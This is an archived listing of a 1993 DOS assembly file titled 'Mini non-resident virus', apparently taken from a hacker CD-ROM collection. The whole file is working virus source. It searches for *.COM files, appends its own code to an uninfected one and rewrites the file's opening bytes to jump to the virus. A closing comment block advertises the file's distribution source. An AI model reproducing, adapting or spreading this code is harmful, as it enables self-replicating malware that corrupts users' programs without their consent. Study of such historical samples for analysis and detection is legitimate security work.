home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / tdupdat2.err / MASUDKHA.ZIP / MINI91.ZIP / MINI91.ASM next >
Encoding:
Assembly Source File  |  1993-12-24  |  3.1 KB  |  101 lines
  1. ;****************************************************************************
  2. ;*              Mini non-resident virus
  3. ;****************************************************************************
  4.  
  5. cseg            segment
  6.                 assume  cs:cseg,ds:cseg,es:cseg,ss:cseg
  7.  
  8.                 .RADIX  16
  9.  
  10. FILELEN         equ     end - start
  11. FILNAM          equ     55h
  12.  
  13.  
  14. ;****************************************************************************
  15. ;*              Dummy program (infected)
  16. ;****************************************************************************
  17.  
  18.                 org     100h
  19.  
  20. begin:          db      0E9, 3, 0
  21.  
  22.  
  23. ;****************************************************************************
  24. ;*              Begin of the virus
  25. ;****************************************************************************
  26.  
  27.  
  28. start:          db      0CDh,  20h, 90
  29.  
  30.                 push    si                      ;si=0100
  31.  
  32.                 mov     di,si
  33.                 add     si,[si+1]               ;si=0103
  34.                 push    si
  35.                 movsw
  36.                 movsb
  37.                 pop     si                      ;si -> start (buffer)
  38.  
  39.                 lea     dx,[si+FILNAM]          ;dx -> filename
  40.                 mov     ah,4Eh                  ;find first file
  41.                 int     21
  42.  
  43.                 mov     dx,009Eh
  44.                 mov     ax,3D02h                ;open the file
  45.                 call    int21
  46.                 jc      exit1
  47.                 xchg    bx,ax
  48.  
  49.                 mov     ah,3fh                  ;read begin of file
  50.                 int     21
  51.  
  52.                 cmp     byte ptr [si],0E9h      ;infected COM?
  53.                 je      exit2
  54.  
  55.                 mov     al,2                    ;go to end of file
  56.                 call    seek
  57.                 xchg    ax,di
  58.  
  59.                 mov     cl, low FILELEN              ;write program to end of file
  60.                 mov     ah,40h
  61.                 int     21
  62.  
  63.                 mov     al,0
  64.                 call    seek
  65.                 mov     byte ptr [si], 0E9h
  66.                 mov     word ptr [si+1], di
  67.  
  68.                 mov     ah,40h
  69.                 int     21
  70.  
  71. exit2:          mov     ah,3Eh                  ;close the file
  72.                 int     21
  73.  
  74. exit1:          ret
  75.  
  76. seek:           mov     ah,42
  77.                 cwd
  78. int21:          xor     cx,cx
  79.                 int     21
  80.                 mov     cl,03
  81.                 mov     dx,si
  82.  
  83. return:         ret
  84.  
  85.  
  86. ;****************************************************************************
  87. ;*              Data
  88. ;****************************************************************************
  89.  
  90. filename        db      '*.COM',0
  91.  
  92. end:
  93.  
  94. cseg            ends
  95.                 end     begin
  96. 
  97. ;  ─────────────────────────────────────────────────────────────────────────
  98. ;  ───────────────> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <───────────────
  99. ;  ───────────> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <───────────
  100. ;  ─────────────────────────────────────────────────────────────────────────
  101.